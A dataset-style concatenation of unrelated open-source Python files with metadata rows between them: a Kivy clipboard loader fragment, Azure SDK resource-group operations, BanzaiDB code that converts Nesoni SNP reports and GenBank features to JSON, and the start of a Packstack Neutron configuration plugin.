return u''
# load clipboard implementation
_clipboards = []
_platform = platform
if _platform == 'android':
_clipboards.append(
('android', 'clipboard_android', 'ClipboardAndroid'))
elif _platform in ('macosx', 'linux', 'win'):
_clipboards.append(
('sdl2', 'clipboard_sdl2', 'ClipboardSDL2'))
_clipboards.append(
('pygame', 'clipboard_pygame', 'ClipboardPygame'))
_clipboards.append(
('dummy', 'clipboard_dummy', 'ClipboardDummy'))
Clipboard = core_select_lib('clipboard', _clipboards, True)
del _clipboards
del _platform
| mit | 7,110,245,703,573,393,000 | 28.766917 | 79 | 0.591816 | false |
Azure/azure-sdk-for-python | sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_05_01/operations/_resource_groups_operations.py | 1 | 26144 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ResourceGroupsOperations(object):
"""ResourceGroupsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.resources.v2019_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def check_existence(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> bool
"""Checks whether a resource group exists.
:param resource_group_name: The name of the resource group to check. The name is case
insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
# Construct URL
url = self.check_existence.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
return 200 <= response.status_code <= 299
check_existence.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def create_or_update(
self,
resource_group_name, # type: str
parameters, # type: "_models.ResourceGroup"
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroup"
"""Creates or updates a resource group.
:param resource_group_name: The name of the resource group to create or update. Can include
alphanumeric, underscore, parentheses, hyphen, period (except at end), and Unicode characters
that match the allowed characters.
:type resource_group_name: str
:param parameters: Parameters supplied to the create or update a resource group.
:type parameters: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroup, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ResourceGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes a resource group.
When you delete a resource group, all of its resources are also deleted. Deleting a resource
group deletes all of its template deployments and currently stored operations.
:param resource_group_name: The name of the resource group to delete. The name is case
insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroup"
"""Gets a resource group.
:param resource_group_name: The name of the resource group to get. The name is case
insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroup, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def update(
self,
resource_group_name, # type: str
parameters, # type: "_models.ResourceGroupPatchable"
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroup"
"""Updates a resource group.
Resource groups can be updated through a simple PATCH operation to a group address. The format
of the request is the same as that for creating a resource group. If a field is unspecified,
the current value is retained.
:param resource_group_name: The name of the resource group to update. The name is case
insensitive.
:type resource_group_name: str
:param parameters: Parameters supplied to update a resource group.
:type parameters: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroupPatchable
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroup, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ResourceGroupPatchable')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def export_template(
self,
resource_group_name, # type: str
parameters, # type: "_models.ExportTemplateRequest"
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroupExportResult"
"""Captures the specified resource group as a template.
:param resource_group_name: The name of the resource group to export as a template.
:type resource_group_name: str
:param parameters: Parameters for exporting the template.
:type parameters: ~azure.mgmt.resource.resources.v2019_05_01.models.ExportTemplateRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroupExportResult, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroupExportResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroupExportResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.export_template.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ExportTemplateRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ResourceGroupExportResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
export_template.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/exportTemplate'} # type: ignore
def list(
self,
filter=None, # type: Optional[str]
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ResourceGroupListResult"]
"""Gets all the resource groups for a subscription.
:param filter: The filter to apply on the operation.:code:`<br>`:code:`<br>`You can filter by
tag names and values. For example, to filter for a tag name and value, use $filter=tagName eq
'tag1' and tagValue eq 'Value1'.
:type filter: str
:param top: The number of results to return. If null is passed, returns all resource groups.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ResourceGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups'} # type: ignore
| mit | -7,771,075,385,938,910,000 | 47.414815 | 161 | 0.63942 | false |
mscook/BanzaiDB | src/BanzaiDB/core.py | 1 | 12137 | # Copyright 2013 Mitchell Stanton-Cook Licensed under the
# Educational Community License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.osedu.org/licenses/ECL-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
import sys
import os
from Bio import SeqIO
from BanzaiDB import parsers
#def bring_CDS_to_front(line):
# """
#
# """
# for e in feat_list:
# if e[]
def nway_reportify(nway_any_file):
"""
Convert a nway.any to something similar to report.txt
This converts the nway.any which contains richer information (i.e. N
calls) into something similar to report.txt
TODO: Add a simple example of input vs output of this method.
ref_id, position, strains, ref_base, v_class, changes, evidence,
consequences
:param nway_any_file: full path as a string the the file nway.any file
:type nway_any_file: string
:returns: a list of tuples. Each list element refers to a variant
position while the tuple contains the states of each strain
"""
parsed = []
nway_any_file = os.path.expanduser(nway_any_file)
if not os.path.isfile(nway_any_file):
print "Please specify a valid Nesoni n-way (any) SNP comparison file"
sys.exit(1)
else:
with open(nway_any_file, 'r') as f:
strains = f.readline().strip().split()[5:-1]
num_strains = len(strains)/3
strains = strains[:num_strains]
for line in f:
uncalled = False
cur = line.split("\t")
ref_id, position, v_class, ref_base = cur[0], int(cur[1]), cur[2], cur[3]
changes = cur[4:num_strains+4]
if 'N' in changes:
uncalled = True
evidence = cur[num_strains+4:(2*(num_strains))+4]
consequences = cur[(2*(num_strains))+4:-1]
# Something is broken if not true -
assert len(strains) == len(changes) == len(evidence)
results = zip([ref_id]*num_strains, [position]*num_strains, strains,
[ref_base]*num_strains, [v_class]*num_strains,
changes, evidence, consequences,
[uncalled]*num_strains)
parsed.append(results)
return parsed
def extract_consequences(cons, ftype):
"""
Extracts out the data from a consequences line
NOTE: This was originally the core of Nesoni_report_to_JSON. However, as
v_class is singular BUT substitution states are observed in deletion
states and other similar we refactored this method out.
:param cons: a consequences line
:param ftype: a feature type (substitution, insertion or deletion
:type cons: string
:type ftype: string
:returns: a data list (containing a controlled set of results)
"""
# May need to add more of these below
misc_set = ['tRNA', 'gene', 'rRNA']
# Handle mixed features in the input reference. This nneds to be more
# generic
mixed = cons.split(',')
if len(mixed) == 2:
# CDS is second
if mixed[1][1:4] == 'CDS':
cons = str(mixed[1][1:-1])+", "+mixed[0]+"\n"
# Work with CDS
if cons.strip() != '' and cons.split(' ')[0] == 'CDS':
if ftype.find("substitution") != -1:
# 0 1 2 3 4 5 6 7
# class|sub_type|locus_tag|base|codon|region|old_aa|new_aa|
# 8 9
# protein|correlated
dat = ('substitution',) + parsers.parse_substitution(cons)
elif ftype.find("insertion") != -1:
dat = ('insertion', None) + parsers.parse_insertion(cons)
elif ftype.find("deletion") != -1:
dat = ('deletion', None) + parsers.parse_deletion(cons)
else:
raise Exception("Unsupported. Only SNPs & INDELS")
dat = list(dat)
dat[3] = int(dat[3])
dat[4] = int(dat[4])
elif cons.strip() != '' and cons.split(' ')[0] in misc_set:
if ftype.find("substitution") != -1:
dat = (('substitution',) +
parsers.parse_substitution_misc(cons))
elif ftype.find("insertion") != -1:
dat = (('insertion', None) +
parsers.parse_insertion_misc(cons))
elif ftype.find("deletion") != -1:
dat = (('deletion', None) +
parsers.parse_deletion_misc(cons))
else:
raise Exception("Unsupported. Only SNPs & INDELS")
dat = list(dat)
dat[3] = int(dat[3])
else:
dat = [ftype.split('-')[0]]+[None]*9
return dat
def nesoni_report_to_JSON(reportified):
"""
Convert a nesoni nway.any file that has been reportified to JSON
See: tables.rst for info on what is stored in RethinkDB
:param reportified: the reportified nway.any file (been through
nway_reportify()). This is essentially a list of tuples
:returns: a list of JSON
"""
stats = {}
parsed_list = []
for position in reportified:
for elem in position:
skip = False
ref_id, pos, strain, old, ftype, new, evidence, cons, uncalled = elem
ref_id = '.'.join(ref_id.split('.')[:-1])
# Initialise the stats...
if strain not in stats:
stats[strain] = 0
if new == old:
# Have no change
#dat = ["conserved"]+[None]*9
skip = True
elif new == 'N':
# Have an uncalled base
#dat = ["uncalled"]+[None]*9
skip = True
# Check for mixtures...
elif ftype == "substitution" and new.find('-') != -1:
# Deletion hidden in substitution
ftype = 'deletion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "substitution" and len(new) > 1:
# Insertion hidden in substitution
ftype = 'insertion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "deletion" and new.find('-') == -1 and len(new) == 1:
# Substitution hidden in deletions
ftype = 'substitution'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "deletion" and new.find('-') == -1 and len(new) > 1:
# Insertion hidden in deletions
ftype = 'insertion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "insertion" and new.find('-') != -1:
# Deletion hidden in insertions
ftype = 'deletion'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
elif ftype == "insertion" and new.find('-') == -1 and len(new) == 1:
# Substitution hidden in insertions
ftype = 'substitution'
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
# We have the same change state across all strains
else:
dat = extract_consequences(cons, ftype)
stats[strain] = stats[strain]+1
obs_count = parsers.parse_evidence(evidence)
# Some simple tests
the_classes = ['insertion', 'deletion', 'substitution']
if not skip:
assert dat[0] in the_classes
json = {"id": strain+'_'+ref_id+'_'+str(pos),
"StrainID": strain,
"Position": pos,
"LocusTag": dat[2],
"Class": dat[0],
"SubClass": dat[1],
"RefBase": old,
"ChangeBase": new,
"CDSBaseNum": dat[3],
"CDSAANum": dat[4],
"CDSRegion": dat[5],
"RefAA": dat[6],
"ChangeAA": dat[7],
"Product": dat[8],
"CorrelatedChange": dat[9],
"Evidence": obs_count,
"UncalledBlock": uncalled
}
parsed_list.append(json)
return parsed_list, stats
def reference_genome_features_to_JSON(genome_file):
"""
From genome reference (GBK format) convert CDS, gene & RNA features to JSON
The following 2 are really good resources:
* http://www.ncbi.nlm.nih.gov/books/NBK63592/
* http://www.ncbi.nlm.nih.gov/genbank/genomesubmit_annotation
.. note:: also see tables.rst for detailed description of the JSON
schema
.. warning:: do not think that this handles misc_features
:param genome_file: the fullpath as a string to the genbank file
:returns: a JSON representing the the reference and a list of JSON
containing information on the features
"""
misc_set = ['tRNA', 'rRNA', 'tmRNA', 'ncRNA']
with open(genome_file) as fin:
genome = SeqIO.read(fin, "genbank")
gd, gn, gid = genome.description, genome.name, genome.id
print "Adding %s into the RethinkDB instance" % (gd)
JSON_r = {'revision': int(gid.split('.')[-1]),
'reference_name': gd,
'id': gn}
parsed_list = []
for feat in genome.features:
start = int(feat.location.start.position)
JSON_f = {'sequence': str(feat.extract(genome.seq)),
'start': start,
'end': int(feat.location.end.position),
'strand': int(feat.strand),
'reference_id': gid,
'product': None,
'translation': None,
'locus_tag': None}
# Handle CDS, gene, tRNA & rRNA features
# Do CDS
if feat.type == 'CDS':
locus_tag = feat.qualifiers['locus_tag'][0]
JSON_f['id'] = gid+"_"+locus_tag+"_CDS"
JSON_f['locus_tag'] = locus_tag
if 'pseudo' not in feat.qualifiers:
JSON_f['translation'] = feat.qualifiers['translation'][0]
JSON_f['product'] = feat.qualifiers['product'][0]
else:
JSON_f['product'] = 'pseudo'
parsed_list.append(JSON_f)
# Do gene
elif feat.type == 'gene':
locus_tag = feat.qualifiers['locus_tag'][0]
JSON_f['id'] = gid+"_"+locus_tag+"_gene"
if 'pseudo' not in feat.qualifiers:
try:
JSON_f['product'] = feat.qualifiers['gene'][0]
except:
pass
else:
JSON_f['product'] = 'pseudo'
parsed_list.append(JSON_f)
# Do other (*RNA)
elif feat.type in misc_set:
try:
JSON_f['product'] = feat.qualifiers['product'][0]
except KeyError:
JSON_f['product'] = None
JSON_f['id'] = gid+"_"+str(JSON_f['start'])+"-"+str(JSON_f['end'])
parsed_list.append(JSON_f)
else:
print "Skipped feature at %i to %i " % (JSON_f['start'],
JSON_f['end'])
return JSON_r, parsed_list
| apache-2.0 | -6,192,113,771,092,387,000 | 39.188742 | 89 | 0.517673 | false |
mohitsethi/packstack | packstack/plugins/neutron_350.py | 1 | 23513 | """
Installs and configures neutron
"""
import logging
import os
import re
import uuid
from packstack.installer import utils
from packstack.installer import validators
from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-NEUTRON"
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Adding OpenStack Neutron configuration")
conf_params = {
"NEUTRON" : [
{"CMD_OPTION" : "neutron-server-host",
"USAGE" : "The IP addresses of the server on which to install the Neutron server",
"PROMPT" : "Enter the IP address of the Neutron server",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_ip, validators.validate_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_SERVER_HOST",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-ks-password",
"USAGE" : "The password to use for Neutron to authenticate with Keystone",
"PROMPT" : "Enter the password for Neutron Keystone access",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_KS_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-db-password",
"USAGE" : "The password to use for Neutron to access DB",
"PROMPT" : "Enter the password for Neutron DB access",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_DB_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-l3-hosts",
"USAGE" : "A comma separated list of IP addresses on which to install Neutron L3 agent",
"PROMPT" : "Enter a comma separated list of IP addresses on which to install the Neutron L3 agent",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_multi_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_L3_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-l3-ext-bridge",
"USAGE" : "The name of the bridge that the Neutron L3 agent will use for external traffic, or 'provider' if using provider networks",
"PROMPT" : "Enter the bridge the Neutron L3 agent will use for external traffic, or 'provider' if using provider networks",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : "br-ex",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_NEUTRON_L3_EXT_BRIDGE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "neutron-dhcp-hosts",
